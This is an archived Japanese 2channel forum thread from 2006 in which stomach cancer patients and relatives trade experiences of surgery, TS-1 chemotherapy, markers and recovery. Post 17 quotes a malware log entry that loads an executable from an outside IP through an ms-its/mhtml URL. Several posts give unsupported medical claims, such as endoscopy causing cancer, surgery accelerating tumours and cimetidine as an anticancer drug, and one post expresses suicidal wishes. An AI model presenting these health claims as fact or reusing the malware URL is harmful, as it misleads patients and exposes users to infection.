2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【術前】胃ガン経験者集まれ!2【術後】

1 ::2006/12/12(火) 00:02:02 ID:99yWNsUs
再びまたーり且つ前向きに話しあいましょう。

前スレ
【術前】胃ガン経験者集まれ!【術後】
http://life7.2ch.net/test/read.cgi/body/1142750598/

2 :病弱名無しさん:2006/12/12(火) 21:47:06 ID:TixzyioR
2げっと!

3 :病弱名無し三鳥:2006/12/14(木) 00:25:32 ID:sRffO5q8
3取りー!!!

4 :病弱名無しさん:2006/12/14(木) 05:01:22 ID:4599nHHa
俺、思うんだけどスキルス性胃がんて胃カメラから感染してるとかってないか?
まだ、未知のウイルスとか・・逸見や王なんかは身内に癌があったからって、定期的に
頻繁に胃カメラやってたみたいだし、そういう人に選択的に珍しいスキルスになってる。
マジ、不安に思う、胃カメラやらなくて血液検査でモニタリングした方がいいのかなって
そういう論文はいまだかつてないのかな?あったら貼ってちょ。

5 :病弱名無しさん:2006/12/14(木) 09:25:28 ID:5qlU+lIm
かろやかに5げっつ

6 :病弱名無しさん:2006/12/16(土) 19:55:14 ID:zl/D3Jxu
よっこらしょ

7 :病弱名無しさん:2006/12/16(土) 20:21:17 ID:WWLYdfxV
生まれて初めての胃カメラで、スキルス胃がんがみつかった
ステージ1のAだったから 無事に完治したよ
すごく精密な腫瘍マーカーはあるにはあるけど 保険適用外で10万ぐらいすると
聞いたことがある 身内に癌の多い人ならやってみる価値はあると思うが
進行の早いスキルスだと年に3回は検査しないと手遅れになりそう。

8 :病弱名無しさん:2006/12/16(土) 21:28:48 ID:H3dFVCjx
確かスキルスはマーカーに殆ど反応しないよね

9 :病弱名無しさん:2006/12/16(土) 21:51:21 ID:WWLYdfxV
そうなんですか、主治医が術後1年間は月に一度、今は3月に一度
血液検査で腫瘍マーカーや肝機能診てくれているので。
胃の組織検査でも スキルスのできてる場所をはずすと 見つけられませんね

10 :病弱名無しさん:2006/12/16(土) 22:01:02 ID:H3dFVCjx
手術前にはマーカー上がってた?
上がってたのが手術後に下がったならかなり判断材料にはなるけど。
でもマーカーは子宮筋腫や良性腫瘍でも反応する。
又は初発で反応しなくとも再発転移の場合には反応することもある。


11 :前スレ6:2006/12/16(土) 23:11:03 ID:PEuwg2v5
おお!皆さん引越しだね。3さん、11さん、ぽいぽいさん、キャロさん、るなさん
他の皆さん来てますか?

私も前回血液検査しまして、来月結果です。ストレスの塊みたいになってるから
変な結果がでないといいなー

12 :あるつと:2006/12/16(土) 23:22:22 ID:syUIDUOt
術前も術後もマーカー(CEA、CA125、CA19-9)は正常でした。ステージUで術後1年になります。
今も毎月一回マーカーチェックしています。3ヶ月に一回CT検査もうけています。
スキルスではなかったけど印鑑細胞癌でした。

13 :病弱名無しさん:2006/12/17(日) 00:16:01 ID:fmLp+G2D
スキルスと印鑑細胞って同じじゃないんですか!?

14 :病弱名無しさん:2006/12/17(日) 00:39:47 ID:4pkD4VW0
医学用語の正しい読み方辞典
http://ton.2ch.net/test/read.cgi/hosp/1004018574/76

76 名前:65♥[age] 投稿日:01/10/27 23:42 ID:???
>>74
scirrhousは間質量が多く線維化を伴う硬癌の俗称です。つまり肉眼分類じゃないです。
俗称、というのは胃癌取扱規約上で定義されていない故です。
一方Borrmann4型は単なる肉眼的分類の一です。
つまり、scirrhousは肉眼的にはBorrmann4型を取ることが多いだけであって、
イコールの概念じゃないんですね。でもほとんど同じなんですけど。

15 :病弱名無しさん:2006/12/17(日) 01:10:00 ID:fmLp+G2D
スキルスは全部印鑑細胞癌だが印鑑細胞癌は全部スキルスとは限らない?

16 :ぽいぽい:2006/12/17(日) 02:53:58 ID:hyWQaZ7u
病理検査すると悪性っていっても色んな形の細胞が出るらしいです。
高分化、中分化、低分化(未分化)、印鑑・・・
自分も全部、勿論印鑑も在ったけど一番在ったのが未分化だったから
病理的には低分化(腺)癌でした。

スキルスって>>14さんも言ってるけど形状の事なんですよね
びらん化してるモノがBorrmann4型=スキルスって認識されてるんですよね
確かに胃の筋層に広がるもんですから判り難くて肉眼的に内視鏡で判るくらいの時には
とても進んだ状態で認識されるので予後が悪いと言われています。

でも、内視鏡検査で経験が在れば胃の形状で解るらしいけどね・・・

>>15さん、そうみたいですね。
印鑑細胞だけだと初期は予後が良いとされてたりしてますけど・・・

誰かちゃんと説明出来る人居ないっすか?w

17 :病弱名無しさん:2006/12/17(日) 03:24:58 ID:7TEfOqMp
鑑定おねがいします
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!http://213.159.117.133/legal/x.chm::/load.exe

18 :病弱名無しさん:2006/12/17(日) 12:29:05 ID:yrJIF7Ia
明日父親が手術です。
当初は半分の予定でしたが全摘に変更になりました。
心配です。(´・ω・`)ショボーン

19 :病弱名無しさん:2006/12/17(日) 12:38:57 ID:5wB1oeGD
気楽にいきましょうE

20 :病弱名無しさん:2006/12/17(日) 13:13:29 ID:qPB2imNS
手術後の説明をよく聞いてね。キモくても摘出物もよく見といてあげてね。本人は見たくても
見れないんだから。きっとうまくいきますよ。

21 :18:2006/12/17(日) 16:49:02 ID:yrJIF7Ia
>>19さん
ありがとう。気楽に行きます。
>>20さん
ありがとう。摘出したものって見るもんなんですか?
お見舞い行ったら四季報と日経買いに行かされた。
買ってきたらすぐ帰されたよ。
元気なつもりなのかな?
元気になれば良いけどね。

22 :病弱名無しさん:2006/12/17(日) 17:38:30 ID:qPB2imNS
取れたものを見せて説明するのが一般的のようです。手術したという証拠ですから。
かみさんと息子が説明を聴きました。癌は外側からみてもわかる大きさだったと言ってました。


23 :病弱名無しさん:2006/12/18(月) 01:35:45 ID:1zME5tc1
母親が胃ガンになった。
近いうちに手術です。
心配で鬱病になりそうです。

24 :病弱名無しさん:2006/12/18(月) 08:33:21 ID:MwpQfKaN
手術をしたら癌が増殖するというのは本当のようです。
手術をしたら癌の増殖スピードが増しました。
重篤な障害が無い限り癌を残すくらいなら姑息手術は避けたほうが良いと思います。
あと、玄米菜食をしばらくしているとなぜか疼痛が緩和されます。


25 :病弱名無しさん:2006/12/18(月) 21:17:32 ID:kZijmZkA
TS-1は試されたのでしょうか?

26 :病弱名無しさん:2006/12/18(月) 22:06:08 ID:SeNbN9Dg
私は28歳で今年6月に胃癌の手術を行ないました。
胃2/3とリンパ摘出でした。手術後、主治医から「88%は大丈夫ですが、残りの12%は分かりません。今後ひょっとしたら抗癌剤を使うかもしれません」
と言われました。    明後日、再検査の結果がでるのですが、不安でたまりません。

27 :病弱名無しさん:2006/12/18(月) 23:31:26 ID:5kEvCd66
私は17%は大丈夫ですが残りの83%はわかりません。
今後は恐らく一生抗癌剤使い続けるしかないでしょうって感じですWまじで。
まあ十年経ったら辞めるか否か考えてみますかね〜生きてたら。
未来はわかんないけど不安はもう殆どありません。
そういうの乗り越えちゃいまちた、もう開き直って毎日必死に生きてます♪
今回のクール3週間休んだせいかキツイっす、既に口裂け女だしだるいよ〜仕事のケアレスミスが恐っ!

28 :病弱名無しさん:2006/12/18(月) 23:34:30 ID:MwpQfKaN
とりあえずシメチジン飲んどけ

29 :病弱名無しさん:2006/12/19(火) 00:33:24 ID:Si7/xPS9
今、病院のロビーです。父が末期で今夜が山みたい。先程、酸素マスクを装着しました。スキルス発覚から2ヶ月半、胃の全摘から2ヶ月。一週間前は元気に散歩までしてたのに… 父は悔いのない人生だったのかな?父親孝行をしなかった自分が憎い…

30 :病弱名無しさん:2006/12/19(火) 01:28:28 ID:pRCQOzHN
胃が痛い…。

31 :るな:2006/12/19(火) 01:40:05 ID:34AxtMzb
28さん、シメチジンはもう2年前から効かなくなり今はPPIです。

29さん、お父様の手を優しくにぎってあげていて下さい。
私なら愛する人にそうされたいと思います、きっと。

32 :病弱名無しさん:2006/12/19(火) 09:53:27 ID:pRCQOzHN
物心ついた頃から自殺願望がありました。
今年、胃癌になっていたので、医師の言われるがままに手術をしたのですが、後悔しています。
私が再発、転移することを祈ります。


33 :病弱名無しさん:2006/12/19(火) 11:29:50 ID:kwCCHFqt
スキルスが胃カメラ感染かもってレス上のほうにあったけど誰も回答していない、、
ってことは否定できないってことじゃないか。この可能性を否定できないと気軽に受けない方がマシって事だな。
確かに、検査している人ほど胃がんになってる、漏れの周りにも一人いる。
印鑑細胞癌の原因らしきものはわっかってないんだろ?胃カメラ怖い・・

34 :あるつと:2006/12/19(火) 14:16:30 ID:AhWFAf14
スキルスが胃カメラが原因でなるとすれば、胃カメラの普及につれてスキルスは増加
するはず。しかし全胃癌に占めるスキルスの割合は過去40年増加傾向はないみたい。
進行胃癌より早期胃癌が多いのは胃カメラが普及したから。私の場合毎年検診を受けていれば、
早期胃癌ですんだはず。思い返すと術前検査で上部消化管造影検査にえらく時間がかかった。
造影剤、発泡剤の追加があったっけ。あれはスキルスを疑っていたんだなあ。不幸中の幸いというか、
type3でした。


35 :病弱名無しさん:2006/12/19(火) 20:47:24 ID:/EPtB/ZR
身内が胃全摘受けて1ヶ月近く経った。背中が痛くて背中からなんか液体を
抜いてるんだけどあれは何かな?ちなみに脾臓も摘出。

胃全摘だと ルーワイ、空腸間置術、ダブルトラクトなどあるけど
手刀医の話だと食道に小腸を繋いだとのこと。小腸と言っても十二指腸
もあるし空腸、回腸もある、腕のいい医者だと十二指腸に繋げるみたい
だけどどれでやったのかな?
ちなみに進行癌でボールマン分類のV型、70歳 女性。ダンピング症状はまだ出てない。

詳しい方よろつく。


36 :病弱名無しさん:2006/12/19(火) 21:53:10 ID:I3J8fs1n
背中から液体を抜いているんではなくて入れているんじゃない?だとすると持続硬膜外麻酔。
エピドラって呼んでいるよ。どんな手術だったかは、手術後に詳しく説明してくれたはず。
聞いていなかったなら担当の看護師に聞いたら?術式くらいは把握していると思う。

37 :病弱名無しさん:2006/12/19(火) 22:23:59 ID:/EPtB/ZR
疼痛緩和の麻酔ですかぁ。。
癌性胸膜炎による胸水とか悪いほうに考えてしまって(^^;
もしくは何らかの細菌感染による胸水かと。。。

38 :病弱名無しさん:2006/12/20(水) 00:31:03 ID:JCI8umsa
なぜ医者に直接聞かず素人の憶測をあてにするのか理解に苦しむ。
当事者じゃないからか、本気で心配してるのだろうか。

39 :病弱名無しさん:2006/12/20(水) 01:04:02 ID:fvL4eOnQ
ここでの胃癌経験者さんはピロリ(+)の方なのでしょうか?ペプシノゲンも正常ですが
何年に一回くらい胃カメラやれば妥当ですか?一回やって医者に聞いたら毎年しなくていいよ。
っていわれました。当方30代後半これから40代に突入です

40 :病弱名無しさん:2006/12/20(水) 01:12:54 ID:5YGsW/3T
>>38
あまり付き合いのない親戚なんで詳しくは聞けないんです。

41 :病弱名無しさん:2006/12/20(水) 03:03:10 ID:9Luq0Scv
無駄に苦痛に耐えながら延命したくない。
俺は癌になったら安楽死を望む。

42 :病弱名無しさん:2006/12/20(水) 06:53:24 ID:wm6JvQWb
皆さん、親が生きてる時に親孝行しといたほうがいいよ。

43 :病弱名無しさん:2006/12/20(水) 08:03:49 ID:JCI8umsa
>>40
身内=家族かと。高齢者は尚更がん以外の持病も多い。
しかしこのスレ胃手術経験の当事者以外が多杉。
タイトル通り経験者だけにしたらどうだ。
身内を心配するのは別スレでやってくれないだろうか。
当事者が末期ならともかくここで何を求めているんだか。

44 :病弱名無しさん:2006/12/20(水) 08:04:40 ID:JCI8umsa
>>40
身内=家族かと。高齢者は尚更がん以外の持病も多い。
しかしこのスレ胃手術経験の当事者以外が多杉。
タイトル通り経験者だけにしたらどうだ。
身内を心配するのは別スレでやってくれないだろうか。
当事者が末期ならともかくここで何を求めているんだか。

45 :病弱名無しさん:2006/12/20(水) 14:53:19 ID:p3l/Em85
当事者より家族の方が沢山の情報を持っていると思うよ。我が家は当事者の父より家族の方が治療に必死だったから。引き続き、当事者と家族からの書き込みを望みます。

46 :病弱名無しさん:2006/12/20(水) 15:55:25 ID:Tzgeed+y
今日、親父が胃カメラで大きいポリープが見つかって、来週検査の結果が出るんですが
かなりの癌である確立が高いらしくて、結果でるまでにしておいた方がいい事とか助言下さい。

お願いします

47 :病弱名無しさん:2006/12/20(水) 16:25:04 ID:c1Fi/kOM
胃癌が心配な奴は胃癌当事者に直接聞きたいんだろうけどそれはちょっと無理だろうな。
ここのスレにはうpとデートななま情報が多いから。俺は当事者だけど家族より情報は
圧倒的に多いと思っている。もしかしたらその辺の一般開業医より胃癌に関しては詳しいかもしれない。
体調が良いとき(休薬期間中)はいろいろカキコしてもいいけど抗癌剤治療中は自分のことで精一杯。
そして今日からいつもの薬が始まった。


48 :病弱名無しさん:2006/12/20(水) 16:27:17 ID:P+Wm7eJs
当事者の年齢や意識によるところが多いと思いますが?
経験者だけとは言わないがちゃんと理解した人たちが集まるスレを希望。
心配だからと言って何も調べず医者にも聞かず(行かず)質問をするのは
愚の骨頂です。
世間にこれだけ情報が溢れていて、医療関係のHPも閲覧しないのは
どうなのかと?

ここは経験者にしか判らない様な事も情報交換出来る場所ですから
自分で調べられる事は調べて上手く活用しましょう。

49 :病弱名無しさん:2006/12/20(水) 16:35:28 ID:P+Wm7eJs
>>46
大型書店に行って関係書籍を2、3冊購入して理解しましょう。
それだけで全然違います。
間違っても「〜で治る」なんて本は手を出すな!

50 :みや:2006/12/20(水) 16:36:14 ID:GIUX99qD
みなさん、どうも
前スレの11ですが、引越したのでコテ変えます。

>>44さん
私の場合は、当事者であり親族でもありますが(がん家系orz)
確かに経験者にしか判らない質問もあれば、
主治医に聞くべき質問や意見も多いですよねw

まぁ、その辺を理解していれば当事者でも家族でもいいのですけどね。


>>46さん
このスレの住人の回答は「敵を知る事!」です!
↓国立がんセンター
http://ganjoho.ncc.go.jp/pub/med_info/cancer/010238.html
↓日本胃癌学会
http://www.jgca.jp/guideline/index.html

とりあえず、胃がんとはなんぞや?と言う敵を知っておく事をおすすめします。

51 :病弱名無しさん:2006/12/20(水) 17:42:19 ID:c1Fi/kOM
友人や職場の同僚に病気のことを聞かれたら正直に答えてきた。カミングアウトってやつかな。
胃癌で手術したって言うといろんな質問をしてくる。それでもって抗癌剤を飲んでいるって言うと
引いちゃう事が多い感じ。急に態度が変わるんだな。なーんもわかっていない感じ。

52 :病弱名無しさん:2006/12/20(水) 17:43:03 ID:Tzgeed+y
ありがとうございます。参考になりました。
本を買ったり、ネットで調べたりと結果出るまで胃がんについて勉強します。

53 :病弱名無しさん:2006/12/20(水) 19:28:21 ID:Hv9GE+wS
印環細胞癌て何ですか? 深達度はMです。
誰か教えてください。

54 :病弱名無しさん:2006/12/20(水) 21:07:30 ID:c1Fi/kOM
胃癌治療ガイドラインによれば早期胃癌のようですが進行、転移が早いタイプです。
速やかな術前検査と手術する事をおすすめします。内視鏡的手術は無理のようです。
ちなみに私はT3でN0。印鑑細胞癌で開腹手術をうけました。がんサポート7月号が胃癌
の最新治療を特集しています。かなり詳しいです。

55 :病弱名無しさん:2006/12/20(水) 22:08:31 ID:JCI8umsa
アルファクラブは平均年齢65才以上かな?
入ってる人いたら現状詳しくよろしく。

56 :病弱名無しさん:2006/12/20(水) 23:38:25 ID:Hv9GE+wS
ありがとうございます。
スキルスとは違うのですか?

57 :病弱名無しさん:2006/12/21(木) 01:57:41 ID:0TYLWQ7t
>>56なぜ自分の命のことなのに医者に聞かない?
その情報だけじゃわからん。
すでにスキルスかも知れないぞ。

58 :ぽいぽい:2006/12/21(木) 03:28:48 ID:Dq627gOG
凄く勘違いしてる人が多いですが・・・
印鑑細胞=スキルスでないです。
ボールマン4型って呼ばれるものがスキルスって言われるものです。

びらん型って言われてて、表面には現れずその内側(筋層)を
悪性腫瘍(細胞)が蝕む状態のコトの様です。
よって、見た目に発見が遅れがちですが内視鏡検査等のとき
胃の形状が硬化する事で異常が発見される様です。
まあ、ここら辺はどれだけ症例を見てるかってコトによるようだけど
ある程度、経験が在れば形が違うの判るらしいです。

ちゃんと主治医と話しましょうよぉ・・・なんで出来ないのかなぁ?
他人事なんですかねぇ?

>>51さん
自分は初発時、胃潰瘍。再発時、イレウスってコトにしてました。
大事な人とか胃潰瘍で手術ってあり得ないって理解してる人にだけ
カミングアウトしました。

>>55さん
自分は入ってないけど年齢相応だと思います。
3ヶ月に一度は病院にある会報読みますけど・・・
40代以下の人は参考になるのかなぁ〜?
って感じだと自分は思うんですが・・・

59 :病弱名無しさん:2006/12/21(木) 05:37:24 ID:tzM8EDf7
                  ,. -‐''"  ̄ ̄ ゙'''‐-、_
                 /            \
                  ,.'                ヽ
                /           -‐      ヽ
              ,.'                 l ヽ  i
              i゙    ,.‐'''ニテラ''''ン‐-..,,, __ ゝ   l
               l   / i,/,,‐=、_‐'''""フ,.''"ヽ、     l
              !   i  /io゚:::::l ヽ  ''"   、/゚'>、  /
           ,.r,.=┤   l  ! ゞ;;;ソ     ,rミ./ヽ/ヽ,.'
         /,.ヘ_ノ.i  l  l、     ,   /リ,ノ'",'彡-'
         /,-<_/i'"'、 !、: !ヽ、  r'''フ  ''"ノ,イ /   ここ通らないと
      / /^)/,.'゙|  ゙、│ヽi __ハ‐---‐‐‐'"ノヽl/      行けないので
     r" ,'ヾ/,.'  ハ  ,.、l.  ヽ  | -‐;ノ,..-l/./ ヽ       ちょっと通りますよっ♪
     ゝ"//  l ,../..i」-、-‐、_/'i ‐''"|  "/
     ヾ'‐、"   l r'   ,'j゙  /^}.l   !  /
      /  \ ヽ___,,,.......レ‐‐ン"リ   i /
     ,.'    ゙'''ヽ、_ r'_/"  ヽ__/    ,!/
     /     ̄ ゙̄''‐-、'、        ‐"
      !   __,.. -‐‐-----ヽ
    l   '"    __,..---、_)
    i/,.r-‐‐‐<_     ゙'、
    ヽ'-‐-/  ,.-'゙"    )
       / r'"     ,.-'
       /,.'"    ,..-'"
       r"    ,.r'"
       ヽ     l
       lヽ   ヽ
     r' 丶   \
      i、   ヽ...--‐'"
      \    \_
        \    _)
         ヽ- ''

60 :病弱名無しさん:2006/12/21(木) 10:17:18 ID:976UB804
俺は父親をスキルスで亡くした。親孝行をしなかった自分を呪いたい。今からでも遅くないから、親孝行をしとけよ!癌が発見されてから孝行に励んでも駄目!元気なうちにしとけ。金なんか要らない孝行も沢山あるから。

61 :るな:2006/12/21(木) 19:08:06 ID:0TYLWQ7t
一番の親孝行は親より一日も長く生きることですよ。
一番の親不孝は親より先に死ぬことです。

62 :病弱名無しさん:2006/12/21(木) 19:23:00 ID:mkscrAT9
アルファはやはりジジババの集まり、昔は胃潰瘍でも胃切除普通だったし。
なぜ若者が少ないのか、つまりは意味がないからだ。
40代以下限定の会を作りたいと思うよ。
このスレをそうするか?
そうすれば祖父母や親が癌になり自分でろくに調べもせずにくるアホが減るぞ。
患者本人でなくていいからとにかく患者は40代以下限定。
そうすればもっと意味のあるスレに成長出来る気がする。

63 :病弱名無しさん:2006/12/21(木) 19:26:37 ID:mkscrAT9
賛成

64 :病弱名無しさん:2006/12/21(木) 19:27:18 ID:mkscrAT9
賛成か反対か皆の意見を待つぞ。

65 :病弱名無しさん:2006/12/21(木) 20:14:11 ID:TTxbUG3X
今、酷い自演を見た。

ちなみに俺は反対。
理由は親父が40代以下じゃないから。
てか、2chで年齢を限定する意味が分からん。
限定したいなら自分でサイトでも作ればいいじゃん。

66 :るな:2006/12/21(木) 20:44:05 ID:0TYLWQ7t
私も反対かな、なぜなら自分が対象外の年令にもうすぐなるからW
但しここに書く前にもう少し医者にきちんと聞いてほしいな。
医者に聞いても理解出来なかったらネットや本で調べましょう、
情報は豊富にある時代なんだもの。
それでも理解出来なかったらここで尋ねてみてね。
私より詳しい人達が沢山いますから誰かが教えてくれますよ。

67 :病弱名無しさん:2006/12/21(木) 21:29:34 ID:qXijQFs9
胃を切除したら、体重がどのくらい減りましたか?
ウエストは何pぐらい減りますか?
どのくらいの期間がかかりました?

68 :病弱名無しさん:2006/12/21(木) 21:42:22 ID:ds8NNj1r
このスレで話題のスキルス胃癌は最近高齢化が進んでいるとの事です。かつては若い女性に多く
とくに未婚の女性に発症する事があって、それは悲惨だったと語り継がれているようです。
一方ピロリ菌の除菌がすすんだり食生活の変化でここ10年以内で分化型の胃癌は減っていくと
考えられています。進行が早い未分化タイプが比較的若い人に増えてきているという報告もあります。
要するに年齢制限を設けるのはナンセンスで反対です。私は50代の患者ですが午前中は医者やってます。

69 :病弱名無しさん:2006/12/21(木) 22:48:56 ID:XwX40daD
質問ですが内視鏡手術も外科の先生がするのですか?

70 :るな:2006/12/21(木) 22:57:59 ID:0TYLWQ7t
68先生、是非ご教授願いたいのです。
私はステージ3B術後四年目ですがずっとTS1を補助化学療法として服用してます。
副作用は主に体中の湿疹と物忘れだけです。
白血球は4週2休で2500〜3200の繰り返しです。
PPI他消化薬も飲んでても食べ過ぎで一年前から脂肪肝です。
ファミリアでコレステロール高いので昔はリポバス今はアリピトールとエパデールS600に一生お世話になります。
院長先生はTS1は、やるしかないだろう、の一言です。
私はあと何年続けるべきでしょうか、死ぬまででしょうか?


71 :病弱名無しさん:2006/12/22(金) 09:12:29 ID:V5fnrVLG
>>67
何故そんなこと知りたい?ダイエットとかなら他スレいけ!!

王監督みたいな例も多いが、自分は2/3除去で術後2キロくらいしか減らず、
数ヶ月にもとに戻ったw

72 :病弱名無しさん:2006/12/22(金) 11:03:56 ID:UpbySJwA
>>71
2/3だと胃と十二指腸を繋げたのですか?ダンピング症状はでませんでした?

73 :ぽいぽい:2006/12/22(金) 14:35:30 ID:VZs9p6sE
>>67
何キロ?ってのは個人差だから・・・
一般的に術前の体重の10〜15%減って5%まで戻るって聞きました
勿論、年齢とかもあるし食に対する興味でもずいぶん違うと思います。
胃が少しでもあれば何年かすると太る人も居ます。
たしかに全摘だと中々体重戻らなくて太らないみたいだけど
稀に自分の様に戻る人も居るらしいです。
ちなみに術後1年半で術前-1.5キロ位です。

>>70るなさん
TS1の耐性に付いては先生はなんて言ってらっしゃるんですか?
白血球が下がってるから効いてるってコトなのかな?
自分の場合、初発時2年続けようって言われてたんだよね
それ以上は余り・・・って感じだったんだよね
結局、自分は効かなくて再発、そして手術で病巣取りきって
今は何も薬飲んでない状態です。
あと、消化薬は術法で大きく違うのかもしれませんね?


74 :あみ:2006/12/22(金) 15:24:07 ID:ZEc9gCZp
みなさん、ごぶさたしました。無事退院して自宅療養してます。
術後は順調で10日目で退院でした。1bだったんですけど、先生からは再発予防の
ために1年半から2年くらいTS-1を服用することをすすめられました。
飲まないという選択もありだけど、有効性があると思うから飲んでみてはどうかと。
飲んでみて副作用がひどかったらすぐやめるそうです。飲んだから絶対再発しない
とはいえないし、再発しなかったとしてそれが薬のせいかどうかもわからない。
だから本人の意思で決めてください、と。
迷ったけど、飲むことにしました。年明けの血液検査後、開始です。
薬代っていくらくらいかかりますか?がん保険にはいってなかったのですごく
心配です。。。
病室で一緒になった人はたいていがん保険にはいってて、みんな「儲かった」って
言ってました(笑)。癌ができた場所はいろいろでも同じ病気の人ばかりだったので、
仲良くなっていっぱい笑って楽しい入院生活でした。
若い方で共通していたのは、極度のストレス抱えた人が多かったこと。そしてそれを
感じさせないような「できた人」が多かった気がします。私はまだまだですが。
早く普通に食べられるようになりたいなぁ。ちなみに体重は2キロくらいしか減ってません。


75 :病弱名無しさん:2006/12/22(金) 16:46:10 ID:mItqKtep
68です。この時間帯は一胃癌患者です。だるさと戦っています。術後補助化学療法の
標準はまだ決まっていない、つまり何をどれくらい続けるのがいいかはわかっていないのです。
私は腫瘍が専門ではないのですが、TS-1はどうも効果がありそうだ、続けられる限り飲んだほうが
いいと考えるようになりました。ちなみにこの薬が保険適応になったのは1999年です。
胃癌治療ガイドラインによるとStageUからVBに対して臨床研究として適応ありとのことです。
私はStageUでTS-1は100mgを飲んでいます。主治医と相談して将来的に減らして行こうとは
考えています。


76 :病弱名無しさん:2006/12/22(金) 17:08:14 ID:V5fnrVLG
>>72
もちろんあったよ。
>>74
退院オメ。
自分も印環1bですが、いまはムコスタ&ガスモチンすら服用していません(主治医に相談済)。
年末年始、時間は沢山あるので再検討してみては・・。
ともあれ楽しい入院生活だったようで良かったですね。
食べ物は時間が解決してくれます。




77 :病弱名無しさん:2006/12/22(金) 20:43:05 ID:eum1ubbd
ガスモチンをやめてシメチジンにしてみれば?
副作用の無い制癌剤と考えると儲けものだよ

78 :病弱名無しさん:2006/12/22(金) 20:56:24 ID:oYCWVWw2
あみさん。ご退院おめでとうございます。TS-1は飲んだほうが良いと思います。
私の場合現在の医療費は自己負担分5万円ぐらいです。かなりきついっす。医療保険は
癌と診断されたら5年間は契約できません。保険会社あまくないっす。

79 :病弱名無しさん:2006/12/22(金) 21:19:08 ID:6mDVAlXo
81歳の父が胃がん3期。認知症もあって手術を進められたけど
完治の保証はないと言う。今はほとんど食事も取れず骨と皮。
こんな状態で手術に耐えられるものか、手術せず余命を待つか家族で
悩んでいます。よきアドバイスをお願いします。

80 :病弱名無しさん:2006/12/22(金) 22:23:34 ID:oYCWVWw2
リスク高すぎね?医者はマジでオペすすめてるの?もいっかい医者と話してみたら?

81 :るな:2006/12/22(金) 23:26:21 ID:sZyjLOqZ
あみさん退院おめでとう!
ステージ1で本当によかった、よかった。
それでも補助化学療法でTS1するなら私が四年目でも納得ですなあ。
学会にも頻繁に行ってる院長先生を信じて私はTR1を続けようっと♪
私は手術の半月前から今現在もずっと毎日100mg続けてますよ。
体重37キロの時はかなりだるくてきつかったけど45キロ超えてからは楽勝、今46キロキープしてます。
副作用は相談にのるからいつでも聞いてね!
女性は美容面も気になるから顔や手の爪とかね。
今は牛乳でもひと口食べたら50回噛むつもりで、ひらすら噛む癖をつけるのがよいわよ。
唾液は最高の消化薬、そうすれば私みたく一生PPI飲むはめにならずにすむ。
今は《噛む》ことだけ頑張れ!あとは何にも頑張らなくていいからさっ♪
本当によかった。遅くても2年後にはTS1も消化薬も全く何も飲まないで普通に食べられるし健康そのもの、何も今までと変わらない状態になれるからね。


82 :るな:2006/12/22(金) 23:37:11 ID:sZyjLOqZ
あららTR1だってプッ、そうそう副作用には代謝拮抗剤だから脳も速度落ちるよ、物忘れやケアレスミスは確実に増えまっせ!
簡単OL事務でも数字や文字のケアレスミスはやばいから私は仕事なら再チェックして慎重にやってる。
仕事復帰したらそこはプロだから気を配ってね、あとはもうどうでもいいからさWなんとかなるもんよ。
気楽に行こう!

83 :病弱名無しさん:2006/12/22(金) 23:45:32 ID:/nyooHW/
  _、_
( ,_ノ` )y━・~~~ 

84 :るな:2006/12/23(土) 00:06:04 ID:E/6R+jOa
ぽいぽいさん、耐性については医者でもはっきりわからないのかも。。。
万一効いてなくても私にはこれしか予防する薬が医学的に無い以上やるしかないと思ってます。
もし止めて一年後いや五年後先でも再発したら絶対に後悔するから。
胃癌仲間の有名人、くれさんが亡くなりましたよ、ご存じですか?
癌は治ったと思ってても十年経ってからでも再発することも、そして腹膜ハシュしたら残りは二ヵ月程度。
本当に恐い病気です、不安をぬぐいさるには金かけても抗癌剤しかない。
民間療法に貢ぐ気はないから保険適用の薬の範囲なら生きていけてますW
再発克服したぽいぽいさんやなりさんは特別超スペシャルラッキーな人なんですよ。
私にもそのラッキー分けて下さい、手まねきしちゃおう幸運の神様
どうかどうか、結婚も出産も正社員の仕事ももう望みませんから、親よりも一日でいいから長生きさせて下さい♪


85 :病弱名無しさん:2006/12/23(土) 00:11:11 ID:pvvUWUNq
Stage1なら抗がん剤はすこし慎重に検討してもいいと思います。
先生の言うように、副作用が少しでもあれば(多分ある)中止、でいいと思われ。
一番大事なのは食生活と気持ち。
病気にならない生き方という本を一読することをお勧めします。
ベストセラーなので立ち読みもしやすいはず。

86 :ぽいぽい:2006/12/23(土) 02:50:39 ID:FPmtIZRA
>>84
わからないこそ自分で選択するしか無いと思います。
その選択域を広げる為にこの様なコミュニティの存在意義が在ると思っています。

自分とか、るなさんが選択した治療は一部分にしか過ぎません。
勿論、エビエンスに沿った事では在りますが、それでも術法や抗ガン剤の投与方法は違います。
いくら知られている人の考え方があっても、それは、ほんの一例にしか過ぎません。
冷たい言い方かもしれませんが選択するのは自分自身なんです。
経験者としてのアドバイスは出来ますがそれ以上の選択をするのは
当事者、もしくは当事者の近くに居る選択権のある人です。

決して自分はラッキーだと思っていません。現時点の状態を受け入れてるだけです。
奇跡ではなく自分が選択した結果が今であると感じています。

自分の父は直腸ガンからの肝転移で余命半年です。
息子と同じ様に再発して何も早くいかなくてもって・・・
色々考えましたけど、それも選択しました。

いっぱい調べて聞いて、自分が後悔しない選択を!

87 :病弱名無しさん:2006/12/23(土) 07:07:40 ID:5/DMAsRr
医者の友達とも話したんだけどさ
ガンてひょっとしてウイルスなんじゃね?

88 :病弱名無しさん:2006/12/23(土) 09:54:14 ID:81T0NIB4
生物が原因という説もあるな

89 :るな:2006/12/23(土) 11:47:03 ID:E/6R+jOa
そう自分の命は自分で責任もつ、その覚悟は重要ですね。
身内がいくら心配してくれても自分自身の命じゃないんだから24時間看てくれるわけじゃないし、
何より毎日三食食べる度に体が疲れるのもどこか痛くなるのも自分にしか経験出来ない。
つらいねってまわりが慰めてくれたって知識として理解してくれてても経験しなけりゃわかない。
しかもこれが食べ続ける限り死ぬまで一生つづくという心理的なストレス。
それを患者以外にわかれったって無理な話。
そして患者の症状も様々、同じステージで同じ手術方法ですらかなり痛みやQOLには個人差あるはずです。
標準治療はあくまで目安ですからね。
標準よりやらなくて安心する人もいれば標準よりやって安心する人も。
何より大事なのは主治医とのコミュニケーションかと。
そして身内や第三者が決めるんじゃなくて患者本人が自分の意志で後悔しない選択肢を選ぶこと!
何より一番重要なのはそれですよね。


90 :病弱名無しさん:2006/12/23(土) 14:22:32 ID:c0Qjht04
     _____
   /。    \
  /        \
 / ┏━━━━━┓   
 |  ┃ ● |● |
 |  ┃ | \__/| |  
 \┃ \■__ / |     え?
